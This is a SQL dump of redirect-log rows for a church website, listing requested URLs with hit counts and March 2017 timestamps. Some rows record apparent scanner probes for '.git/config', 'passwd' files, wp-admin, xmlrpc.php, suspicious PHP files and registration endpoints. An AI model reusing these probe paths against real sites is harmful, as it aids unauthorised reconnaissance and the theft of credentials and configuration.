(4274, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/16', NULL, '', '', 15, 0, '2017-03-15 19:25:24', '0000-00-00 00:00:00', 301),
(4275, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/27', NULL, '', '', 15, 0, '2017-03-15 19:32:39', '0000-00-00 00:00:00', 301),
(4276, 'http://lifeoasisinternationalchurch.org/user/login', NULL, '', '', 1, 0, '2017-03-15 21:11:23', '0000-00-00 00:00:00', 301),
(4277, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/2-module-positions', NULL, '', '', 4, 0, '2017-03-15 21:12:29', '0000-00-00 00:00:00', 301),
(4278, 'http://lifeoasisinternationalchurch.org/live-streaming', NULL, '', '', 31, 0, '2017-03-15 21:42:45', '0000-00-00 00:00:00', 301),
(4279, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/6-integrated-extensions', NULL, '', '', 9, 0, '2017-03-15 22:03:15', '0000-00-00 00:00:00', 301),
(4280, 'http://lifeoasisinternationalchurch.org/component/user/register', NULL, 'http://lifeoasisinternationalchurch.org/component/user/register', '', 6, 0, '2017-03-16 03:28:36', '0000-00-00 00:00:00', 301),
(4281, 'http://lifeoasisinternationalchurch.org/about-us/', NULL, '', '', 2, 0, '2017-03-16 04:09:59', '0000-00-00 00:00:00', 301),
(4282, 'http://lifeoasisinternationalchurch.org/index.php/template-info/gin', NULL, '', '', 2, 0, '2017-03-16 05:04:10', '0000-00-00 00:00:00', 301),
(4283, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/10/12/15', NULL, '', '', 1, 0, '2017-03-16 05:04:13', '0000-00-00 00:00:00', 301),
(4284, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-16 06:57:59', '0000-00-00 00:00:00', 301),
(4285, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', NULL, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=login', '', 12494, 0, '2017-03-16 13:27:35', '0000-00-00 00:00:00', 301),
(4286, 'https://www.lifeoasisinternationalchurch.org/index.php/component/user/?task=register', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 12234, 0, '2017-03-16 13:27:35', '0000-00-00 00:00:00', 301),
(4287, 'http://lifeoasisinternationalchurch.org/template-info/books/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-16 15:48:55', '0000-00-00 00:00:00', 301),
(4288, 'http://lifeoasisinternationalchurch.org/ministries/books/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-03-16 16:59:29', '0000-00-00 00:00:00', 301),
(4289, 'http://www.lifeoasisinternationalchurch.org/cache/js-eeaf3ed6d32e7803a801c99df6b356f2.php', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages', '', 1, 0, '2017-03-16 18:08:20', '0000-00-00 00:00:00', 301),
(4290, 'https://lifeoasisinternationalchurch.org/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 12, 0, '2017-03-16 20:43:28', '0000-00-00 00:00:00', 301),
(4291, 'http://lifeoasisinternationalchurch.org/index.php/169-prophetic-words-for-day-5', NULL, '', '', 1, 0, '2017-03-16 22:08:49', '0000-00-00 00:00:00', 301),
(4292, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/17-prayer-a-fasting-day-1', NULL, '', '', 14, 0, '2017-03-17 01:10:06', '0000-00-00 00:00:00', 301),
(4293, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 22, 0, '2017-03-17 01:17:16', '0000-00-00 00:00:00', 301),
(4294, 'http://www.lifeoasisinternationalchurch.org/asom', NULL, '', '', 1, 0, '2017-03-17 01:19:44', '0000-00-00 00:00:00', 301),
(4295, 'http://www.lifeoasisinternationalchurch.org/streaming3/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-03-17 01:31:47', '0000-00-00 00:00:00', 301),
(4296, 'http://lifeoasisinternationalchurch.org/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-03-17 05:04:23', '0000-00-00 00:00:00', 301),
(4297, 'http://lifeoasisinternationalchurch.org/component/content/category/17-fp-headlines-lists', NULL, '', '', 1, 0, '2017-03-17 05:06:11', '0000-00-00 00:00:00', 301),
(4298, 'http://www.lifeoasisinternationalchurch.org/pastorsclinic/cli/update_cron.php', NULL, '', '', 3, 0, '2017-03-17 07:59:34', '0000-00-00 00:00:00', 301),
(4299, 'http://www.lifeoasisinternationalchurch.org/media/system/title.php', NULL, '', '', 2, 0, '2017-03-17 08:20:04', '0000-00-00 00:00:00', 301),
(4300, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 20, 0, '2017-03-17 13:53:32', '0000-00-00 00:00:00', 301),
(4301, 'https://lifeoasisinternationalchurch.org/index.php/277-day-17-of-21-days-fasting-and-prayer-november', NULL, '', '', 27, 0, '2017-03-17 13:57:32', '0000-00-00 00:00:00', 301),
(4302, 'https://lifeoasisinternationalchurch.org/about-us/bible-reading', NULL, '', '', 36, 0, '2017-03-17 13:58:00', '0000-00-00 00:00:00', 301),
(4303, 'https://lifeoasisinternationalchurch.org/index.php/267-day-7-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 24, 0, '2017-03-17 13:58:31', '0000-00-00 00:00:00', 301),
(4304, 'https://lifeoasisinternationalchurch.org/full-hd-streaming', NULL, '', '', 34, 0, '2017-03-17 13:58:58', '0000-00-00 00:00:00', 301),
(4305, 'http://lifeoasisinternationalchurch.org/spiritmeat/index.php/11-july-2013/49-the-wisdom-of-abigail-1-samuel-25-14-43', NULL, '', '', 2, 0, '2017-03-17 15:07:35', '0000-00-00 00:00:00', 301),
(4306, 'http://lifeoasisinternationalchurch.org/index.php/62-prayer-focus-for-day-10', NULL, '', '', 11, 0, '2017-03-17 15:09:20', '0000-00-00 00:00:00', 301),
(4307, 'http://www.lifeoasisinternationalchurch.org/modules/mod_fxprev/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/modules/mod_fxprev/index.html', '', 1, 0, '2017-03-17 15:48:43', '0000-00-00 00:00:00', 301),
(4308, 'http://lifeoasisinternationalchurch.org/ you tube', NULL, '', '', 19, 0, '2017-03-17 18:19:58', '0000-00-00 00:00:00', 301),
(4309, 'http://lifeoasisinternationalchurch.org/you tube living by the answer', NULL, '', '', 1, 0, '2017-03-17 19:00:09', '0000-00-00 00:00:00', 301),
(4310, 'http://lifeoasisinternationalchurch.org/ streamed live on 15 Marck 2017', NULL, '', '', 1, 0, '2017-03-17 19:51:55', '0000-00-00 00:00:00', 301),
(4311, 'http://lifeoasisinternationalchurch.org/live', NULL, '', '', 2, 0, '2017-03-17 20:07:47', '0000-00-00 00:00:00', 301),
(4312, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/18-sample-content-7', NULL, '', '', 4, 0, '2017-03-17 22:23:17', '0000-00-00 00:00:00', 301),
(4313, 'http://lifeoasisinternationalchurch.org/modules/mod_fxprev/index.html', NULL, 'http://lifeoasisinternationalchurch.org/modules/mod_fxprev/index.html', '', 1, 0, '2017-03-17 23:11:44', '0000-00-00 00:00:00', 301),
(4314, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/19-prayer-a-fasting-day-11', NULL, '', '', 19, 0, '2017-03-17 23:58:32', '0000-00-00 00:00:00', 301),
(4315, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-03-18 00:47:14', '0000-00-00 00:00:00', 301),
(4316, 'https://www.spiritmeat.net/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 1, 0, '2017-03-18 00:57:54', '0000-00-00 00:00:00', 301),
(4317, 'https://www.spiritmeat.net/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 1, 0, '2017-03-18 00:57:56', '0000-00-00 00:00:00', 301),
(4318, 'https://www.spiritmeat.net/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 1, 0, '2017-03-18 00:57:59', '0000-00-00 00:00:00', 301),
(4319, 'https://www.spiritmeat.net/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 1, 0, '2017-03-18 00:58:06', '0000-00-00 00:00:00', 301),
(4320, 'http://www.lifeoasisinternationalchurch.org/loic/outreach.php', NULL, '', '', 9, 0, '2017-03-18 02:11:11', '0000-00-00 00:00:00', 301),
(4321, 'https://lifeoasisinternationalchurch.org/loic/zionpillars.php', NULL, '', '', 20, 0, '2017-03-18 03:00:06', '0000-00-00 00:00:00', 301),
(4322, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/mimmp', NULL, '', '', 11, 0, '2017-03-18 04:01:37', '0000-00-00 00:00:00', 301),
(4323, 'https://lifeoasisinternationalchurch.org/index.php/62-prayer-focus-for-day-10', NULL, '', '', 24, 0, '2017-03-18 06:16:15', '0000-00-00 00:00:00', 301),
(4324, 'http://www.lifeoasisinternationalchurch.org//steaaming', NULL, '', '', 2, 0, '2017-03-18 08:16:24', '0000-00-00 00:00:00', 301),
(4325, 'http://www.lifeoasisinternationalchurch.org/140-2014-11', NULL, '', '', 1, 0, '2017-03-18 11:18:20', '0000-00-00 00:00:00', 301),
(4326, 'https://lifeoasisinternationalchurch.org/resources/hd', NULL, '', '', 50, 0, '2017-03-18 11:20:29', '0000-00-00 00:00:00', 301),
(4327, 'http://www.lifeoasisinternationalchurch.org/64-day-12', NULL, '', '', 1, 0, '2017-03-18 16:11:20', '0000-00-00 00:00:00', 301),
(4328, 'http://www.lifeoasisinternationalchurch.org/index.php?layout=write&option=com_easyblog&view=dashboard', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 3, 0, '2017-03-18 18:40:36', '0000-00-00 00:00:00', 301),
(4329, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/17-prayer-a-fasting-day-1', NULL, '', '', 2, 0, '2017-03-18 21:11:24', '0000-00-00 00:00:00', 301),
(4330, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/19-sample-content-8', NULL, '', '', 5, 0, '2017-03-18 23:01:53', '0000-00-00 00:00:00', 301),
(4331, 'http://www.lifeoasisinternationalchurch.org/vision.php', NULL, '', '', 2, 0, '2017-03-19 04:07:57', '0000-00-00 00:00:00', 301),
(4332, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 16, 0, '2017-03-19 05:39:56', '0000-00-00 00:00:00', 301),
(4333, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/80060', NULL, '', '', 5, 0, '2017-03-19 06:52:15', '0000-00-00 00:00:00', 301),
(4334, 'http://lifeoasisinternationalchurch.org/live-streamingyou tube', NULL, '', '', 17, 0, '2017-03-19 06:57:50', '0000-00-00 00:00:00', 301),
(4335, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/18-loic', NULL, '', '', 2, 0, '2017-03-19 07:36:08', '0000-00-00 00:00:00', 301),
(4336, 'http://lifeoasisinternationalchurch.org/wp-admin', NULL, '', '', 1, 0, '2017-03-19 09:02:37', '0000-00-00 00:00:00', 301),
(4337, 'http://lifeoasisinternationalchurch.org/resources/blog/wp-admin', NULL, '', '', 1, 0, '2017-03-19 09:03:28', '0000-00-00 00:00:00', 301),
(4338, 'http://www.lifeoasisinternationalchurch.org/154-focus32', NULL, '', '', 1, 0, '2017-03-19 14:09:35', '0000-00-00 00:00:00', 301),
(4339, 'http://www.lifeoasisinternationalchurch.org/index.php/login-form', NULL, '', '', 4, 0, '2017-03-19 16:01:05', '0000-00-00 00:00:00', 301),
(4340, 'http://www.lifeoasisinternationalchurch.org/index.php/login', NULL, '', '', 10, 0, '2017-03-19 16:01:05', '0000-00-00 00:00:00', 301),
(4341, 'http://www.lifeoasisinternationalchurch.org/index.php/register', NULL, '', '', 4, 0, '2017-03-19 16:01:06', '0000-00-00 00:00:00', 301),
(4342, 'http://www.lifeoasisinternationalchurch.org/log-out.html', NULL, '', '', 4, 0, '2017-03-19 16:01:07', '0000-00-00 00:00:00', 301),
(4343, 'http://www.lifeoasisinternationalchurch.org/register.html', NULL, '', '', 2, 0, '2017-03-19 16:01:22', '0000-00-00 00:00:00', 301),
(4344, 'http://www.lifeoasisinternationalchurch.org/index.php/log-out?view=registration', NULL, '', '', 1, 0, '2017-03-19 16:01:23', '0000-00-00 00:00:00', 301),
(4345, 'http://www.lifeoasisinternationalchurch.org/loggin.html?view=registration', NULL, '', '', 1, 0, '2017-03-19 16:01:25', '0000-00-00 00:00:00', 301),
(4346, 'http://www.lifeoasisinternationalchurch.org/registration-form', NULL, '', '', 2, 0, '2017-03-19 16:01:28', '0000-00-00 00:00:00', 301),
(4347, 'http://www.lifeoasisinternationalchurch.org/register-for-access', NULL, '', '', 1, 0, '2017-03-19 16:01:31', '0000-00-00 00:00:00', 301),
(4348, 'http://www.lifeoasisinternationalchurch.org/user-profile?view=registration', NULL, '', '', 1, 0, '2017-03-19 16:01:34', '0000-00-00 00:00:00', 301),
(4349, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/53-testing', NULL, '', '', 1, 0, '2017-03-19 18:30:02', '0000-00-00 00:00:00', 301),
(4350, 'http://www.lifeoasisinternationalchurch.org/prayer/174-focus40-3', NULL, '', '', 1, 0, '2017-03-20 00:03:18', '0000-00-00 00:00:00', 301),
(4351, 'http://lifeoasisinternationalchurch.org/index.php?layout=write&option=com_easyblog&view=dashboard', NULL, 'http://lifeoasisinternationalchurch.org/', '', 37, 0, '2017-03-20 00:21:59', '0000-00-00 00:00:00', 301),
(4352, 'http://lifeoasisinternationalchurch.org/qwertyuioplkjhgfdsazxcvbnm.html', NULL, '', '', 1, 0, '2017-03-20 09:49:52', '0000-00-00 00:00:00', 301),
(4353, 'https://www.spiritmeat.net/component/content/article/12-sample-content/12-sample-content-1', NULL, '', '', 1, 0, '2017-03-20 10:22:24', '0000-00-00 00:00:00', 301),
(4354, 'https://www.spiritmeat.net/component/content/article/12-sample-content/15-sample-content-4', NULL, '', '', 1, 0, '2017-03-20 10:22:33', '0000-00-00 00:00:00', 301),
(4355, 'https://www.spiritmeat.net/component/content/article/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2017-03-20 10:22:34', '0000-00-00 00:00:00', 301),
(4356, 'https://www.spiritmeat.net/component/content/category/17-fp-headlines-lists', NULL, '', '', 2, 0, '2017-03-20 10:22:41', '0000-00-00 00:00:00', 301),
(4357, 'https://www.spiritmeat.net/featured-messages/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-20 10:22:43', '0000-00-00 00:00:00', 301),
(4358, 'https://www.spiritmeat.net/mp3-messages/sermon/10-grace-2', NULL, '', '', 1, 0, '2017-03-20 10:27:28', '0000-00-00 00:00:00', 301),
(4359, 'https://www.spiritmeat.net/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 1, 0, '2017-03-20 10:27:36', '0000-00-00 00:00:00', 301),
(4360, 'https://www.spiritmeat.net/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 1, 0, '2017-03-20 10:27:38', '0000-00-00 00:00:00', 301),
(4361, 'https://www.spiritmeat.net/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 1, 0, '2017-03-20 10:27:40', '0000-00-00 00:00:00', 301),
(4362, 'https://www.spiritmeat.net/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 1, 0, '2017-03-20 10:27:41', '0000-00-00 00:00:00', 301),
(4363, 'https://www.spiritmeat.net/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 1, 0, '2017-03-20 10:27:43', '0000-00-00 00:00:00', 301),
(4364, 'https://www.spiritmeat.net/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 1, 0, '2017-03-20 10:27:45', '0000-00-00 00:00:00', 301),
(4365, 'https://www.spiritmeat.net/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 1, 0, '2017-03-20 10:27:47', '0000-00-00 00:00:00', 301),
(4366, 'https://www.spiritmeat.net/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 1, 0, '2017-03-20 10:27:49', '0000-00-00 00:00:00', 301),
(4367, 'https://www.spiritmeat.net/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, '', '', 1, 0, '2017-03-20 10:27:51', '0000-00-00 00:00:00', 301),
(4368, 'https://www.spiritmeat.net/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 1, 0, '2017-03-20 10:28:08', '0000-00-00 00:00:00', 301),
(4369, 'https://www.spiritmeat.net/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 1, 0, '2017-03-20 10:28:10', '0000-00-00 00:00:00', 301),
(4370, 'https://www.spiritmeat.net/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 1, 0, '2017-03-20 10:28:17', '0000-00-00 00:00:00', 301),
(4371, 'https://www.spiritmeat.net/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 1, 0, '2017-03-20 10:28:19', '0000-00-00 00:00:00', 301),
(4372, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/10-preset-styles', NULL, '', '', 3, 0, '2017-03-20 11:49:24', '0000-00-00 00:00:00', 301),
(4373, 'http://lifeoasisinternationalchurch.org/index.php/component/user', NULL, '(null)', '', 1, 0, '2017-03-20 17:36:47', '0000-00-00 00:00:00', 301),
(4374, 'http://lifeoasisinternationalchurch.org/ministries/global-intercessory-network', NULL, '', '', 1, 0, '2017-03-20 18:32:00', '0000-00-00 00:00:00', 301),
(4375, 'https://lifeoasisinternationalchurch.org/loic/events.php', NULL, '', '', 7, 0, '2017-03-20 19:20:05', '0000-00-00 00:00:00', 301),
(4376, 'http://lifeoasisinternationalchurch.org/you tube', NULL, '', '', 2, 0, '2017-03-21 05:35:30', '0000-00-00 00:00:00', 301),
(4377, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&tmpl=component&id=63&popupiniframe=true', NULL, '', '', 3, 0, '2017-03-21 07:31:20', '0000-00-00 00:00:00', 301),
(4378, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&task=register', NULL, '', '', 6, 0, '2017-03-21 09:14:09', '0000-00-00 00:00:00', 301),
(4379, 'http://www.lifeoasisinternationalchurch.org/index.php/joomla/other-components/registration-form', NULL, '', '', 3, 0, '2017-03-21 09:14:16', '0000-00-00 00:00:00', 301),
(4380, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_community&view=register', NULL, '', '', 3, 0, '2017-03-21 09:14:21', '0000-00-00 00:00:00', 301),
(4381, 'http://www.lifeoasisinternationalchurch.org/index.php/component/user/register.html', NULL, '', '', 3, 0, '2017-03-21 09:14:25', '0000-00-00 00:00:00', 301),
(4382, 'http://www.lifeoasisinternationalchurch.org/index.php/registration/registers', NULL, '', '', 3, 0, '2017-03-21 09:14:26', '0000-00-00 00:00:00', 301),
(4383, 'http://www.lifeoasisinternationalchurch.org/registratsiya/registers', NULL, '', '', 3, 0, '2017-03-21 09:14:27', '0000-00-00 00:00:00', 301),
(4384, 'http://www.lifeoasisinternationalchurch.org/component/comprofiler/registers.html', NULL, '', '', 3, 0, '2017-03-21 09:14:29', '0000-00-00 00:00:00', 301),
(4385, 'http://www.lifeoasisinternationalchurch.org/user/registration', NULL, '', '', 3, 0, '2017-03-21 09:14:30', '0000-00-00 00:00:00', 301),
(4386, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_secureregistration&task=register', NULL, '', '', 3, 0, '2017-03-21 09:14:31', '0000-00-00 00:00:00', 301),
(4387, 'http://www.lifeoasisinternationalchurch.org/component/option,com_comprofiler/task,registers/', NULL, '', '', 3, 0, '2017-03-21 09:14:34', '0000-00-00 00:00:00', 301),
(4388, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_registration&task=register', NULL, '', '', 10, 0, '2017-03-21 09:14:38', '0000-00-00 00:00:00', 301),
(4389, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_comprofiler&task=registers', NULL, '', '', 6, 0, '2017-03-21 09:14:38', '0000-00-00 00:00:00', 301),
(4390, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_joocm&view=register', NULL, '', '', 3, 0, '2017-03-21 09:14:40', '0000-00-00 00:00:00', 301),
(4391, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easysocial&view=registration', NULL, '', '', 6, 0, '2017-03-21 09:14:41', '0000-00-00 00:00:00', 301),
(4392, 'http://www.lifeoasisinternationalchurch.org/live.php', NULL, '', '', 11, 0, '2017-03-21 10:09:42', '0000-00-00 00:00:00', 301),
(4393, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/54-slide-04', NULL, '', '', 1, 0, '2017-03-21 10:31:55', '0000-00-00 00:00:00', 301),
(4394, 'https://www.spiritmeat.net/resources/youtube-live', NULL, '', '', 1, 0, '2017-03-21 10:53:32', '0000-00-00 00:00:00', 301),
(4395, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/', NULL, '', '', 2, 0, '2017-03-21 10:57:15', '0000-00-00 00:00:00', 301),
(4396, 'https://lifeoasisinternationalchurch.org/index.php/63-2014-10', NULL, '', '', 18, 0, '2017-03-21 14:45:32', '0000-00-00 00:00:00', 301),
(4397, 'https://lifeoasisinternationalchurch.org/loic/programmes.php', NULL, '', '', 2, 0, '2017-03-21 14:46:52', '0000-00-00 00:00:00', 301),
(4398, 'http://www.lifeoasisinternationalchurch.org/streaming/private', NULL, '', '', 22, 0, '2017-03-21 16:07:14', '0000-00-00 00:00:00', 301),
(4399, 'http://www.lifeoasisinternationalchurch.org/priva', NULL, '', '', 7, 0, '2017-03-21 17:10:10', '0000-00-00 00:00:00', 301),
(4400, 'http://lifeoasisinternationalchurch.org/resources/PRIVATE-streaming', NULL, '', '', 1, 0, '2017-03-21 17:19:59', '0000-00-00 00:00:00', 301),
(4401, 'http://www.lifeoasisinternationalchurch.org/resources/private', NULL, '', '', 20, 0, '2017-03-21 17:23:56', '0000-00-00 00:00:00', 301),
(4402, 'http://www.lifeoasisinternationalchurch.org/component/user/?task=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=login', '', 3726, 0, '2017-03-21 19:28:46', '0000-00-00 00:00:00', 301),
(4403, 'http://www.lifeoasisinternationalchurch.org/option=com_user?view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/user/?task=register', '', 3730, 0, '2017-03-21 19:28:47', '0000-00-00 00:00:00', 301),
(4404, 'http://lifeoasisinternationalchurch.org/blog/xmlrpc.php?rsd', NULL, '', '', 1, 0, '2017-03-21 20:55:28', '0000-00-00 00:00:00', 301),
(4405, 'http://lifeoasisinternationalchurch.org/blog/blog/', NULL, '', '', 1, 0, '2017-03-21 20:55:31', '0000-00-00 00:00:00', 301),
(4406, 'http://lifeoasisinternationalchurch.org/blog/wordpress/', NULL, '', '', 1, 0, '2017-03-21 20:55:32', '0000-00-00 00:00:00', 301),
(4407, 'http://www.lifeoasisinternationalchurch.org/index.php/gaestebuch/', NULL, '', '', 2, 0, '2017-03-21 21:16:16', '0000-00-00 00:00:00', 301),
(4408, 'http://www.lifeoasisinternationalchurch.org/gaestebuch', NULL, '', '', 2, 0, '2017-03-21 21:16:17', '0000-00-00 00:00:00', 301),
(4409, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_akobook', NULL, '', '', 2, 0, '2017-03-21 21:16:18', '0000-00-00 00:00:00', 301),
(4410, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_jambook', NULL, '', '', 2, 0, '2017-03-21 21:16:19', '0000-00-00 00:00:00', 301),
(4411, 'http://www.lifeoasisinternationalchurch.org/component/jambook/', NULL, '', '', 2, 0, '2017-03-21 21:16:20', '0000-00-00 00:00:00', 301),
(4412, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jambook/', NULL, '', '', 2, 0, '2017-03-21 21:16:20', '0000-00-00 00:00:00', 301),
(4413, 'http://www.lifeoasisinternationalchurch.org/guestbook/', NULL, '', '', 2, 0, '2017-03-21 21:16:21', '0000-00-00 00:00:00', 301),
(4414, 'http://www.lifeoasisinternationalchurch.org/index.php/guestbook/', NULL, '', '', 4, 0, '2017-03-21 21:16:22', '0000-00-00 00:00:00', 301),
(4415, 'http://www.lifeoasisinternationalchurch.org/index.php/gaestebuch', NULL, '', '', 2, 0, '2017-03-21 21:16:22', '0000-00-00 00:00:00', 301),
(4416, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook&id=1', NULL, '', '', 2, 0, '2017-03-21 21:16:23', '0000-00-00 00:00:00', 301),
(4417, 'http://lifeoasisinternationalchurch.org/component/user/?task=register', NULL, 'http://lifeoasisinternationalchurch.org/component/users/?view=login', '', 6645, 0, '2017-03-22 00:11:54', '0000-00-00 00:00:00', 301),
(4418, 'http://lifeoasisinternationalchurch.org/option=com_user?view=register', NULL, 'http://lifeoasisinternationalchurch.org/component/user/?task=register', '', 6645, 0, '2017-03-22 00:11:55', '0000-00-00 00:00:00', 301),
(4419, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 14, 0, '2017-03-22 08:28:13', '0000-00-00 00:00:00', 301),
(4420, 'https://www.spiritmeat.net/mp3-messages/speaker/2/sermons', NULL, '', '', 1, 0, '2017-03-22 13:57:26', '0000-00-00 00:00:00', 301),
(4421, 'http://www.lifeoasisinternationalchurch.org/loic/tracts.php', NULL, '', '', 7, 0, '2017-03-22 14:10:58', '0000-00-00 00:00:00', 301),
(4422, 'http://lifeoasisinternationalchurch.org/prayer/150-focus29', NULL, '', '', 1, 0, '2017-03-22 15:24:13', '0000-00-00 00:00:00', 301),
(4423, 'http://lifeoasisinternationalchurch.org/prayer/142-2014-13', NULL, '', '', 1, 0, '2017-03-22 15:24:13', '0000-00-00 00:00:00', 301),
(4424, 'http://lifeoasisinternationalchurch.org/live-streamingperiscope', NULL, '', '', 1, 0, '2017-03-22 15:59:37', '0000-00-00 00:00:00', 301),
(4425, 'http://lifeoasisinternationalchurch.org/streming', NULL, '', '', 3, 0, '2017-03-22 18:22:54', '0000-00-00 00:00:00', 301),
(4426, 'http://lifeoasisinternationalchurch.org/yutube', NULL, '', '', 1, 0, '2017-03-22 18:31:18', '0000-00-00 00:00:00', 301),
(4427, 'https://dciradio.org/.git/config', NULL, '', '', 1, 0, '2017-03-22 18:59:34', '0000-00-00 00:00:00', 301),
(4428, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 8829, 0, '2017-03-22 19:44:02', '0000-00-00 00:00:00', 301),
(4429, 'http://www.lifeoasisinternationalchurch.org/vision.html', NULL, '', '', 1, 0, '2017-03-22 23:41:11', '0000-00-00 00:00:00', 301),
(4430, 'http://lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-03-23 02:49:03', '0000-00-00 00:00:00', 301),
(4431, 'http://lifeoasisinternationalchurch.org/xmlrpc.php', NULL, '', '', 74, 0, '2017-03-23 03:16:38', '0000-00-00 00:00:00', 301),
(4432, 'https://142.4.21.132/current_config/passwd', NULL, '', '', 7, 0, '2017-03-23 03:29:22', '0000-00-00 00:00:00', 301),
(4433, 'https://142.4.21.132/current_config/Account1', NULL, '', '', 4, 0, '2017-03-23 03:29:22', '0000-00-00 00:00:00', 301),
(4434, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/music', NULL, '', '', 1, 0, '2017-03-23 04:07:27', '0000-00-00 00:00:00', 301),
(4435, 'http://www.lifeoasisinternationalchurch.org/swearing', NULL, '', '', 1, 0, '2017-03-23 07:43:57', '0000-00-00 00:00:00', 301),
(4436, 'http://lifeoasisinternationalchurch.org/license.php', NULL, '', '', 4, 0, '2017-03-23 10:16:35', '0000-00-00 00:00:00', 301),
(4437, 'http://lifeoasisinternationalchurch.org/administrator/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/logo_img.php', '', 2, 0, '2017-03-23 12:56:26', '0000-00-00 00:00:00', 301),
(4438, 'https://lifeoasisinternationalchurch.org/hidden-stream', NULL, '', '', 38, 0, '2017-03-23 15:58:29', '0000-00-00 00:00:00', 301),
(4439, 'http://www.lifeoasisinternationalchurch.org/index.php/138-day-12', NULL, '', '', 3, 0, '2017-03-23 18:03:39', '0000-00-00 00:00:00', 301),
(4440, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/44-prayer-a-fasting-day-33', NULL, '', '', 13, 0, '2017-03-23 18:05:36', '0000-00-00 00:00:00', 301),
(4441, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-confession', NULL, '', '', 1, 0, '2017-03-23 18:09:37', '0000-00-00 00:00:00', 301),
(4442, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-confes', NULL, '', '', 1, 0, '2017-03-23 18:09:39', '0000-00-00 00:00:00', 301),
(4443, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-confe', NULL, '', '', 1, 0, '2017-03-23 18:09:39', '0000-00-00 00:00:00', 301),
(4444, 'http://lifeoasisinternationalchurch.org/resources/blog/item/6-scriptural-co', NULL, '', '', 1, 0, '2017-03-23 18:09:39', '0000-00-00 00:00:00', 301),
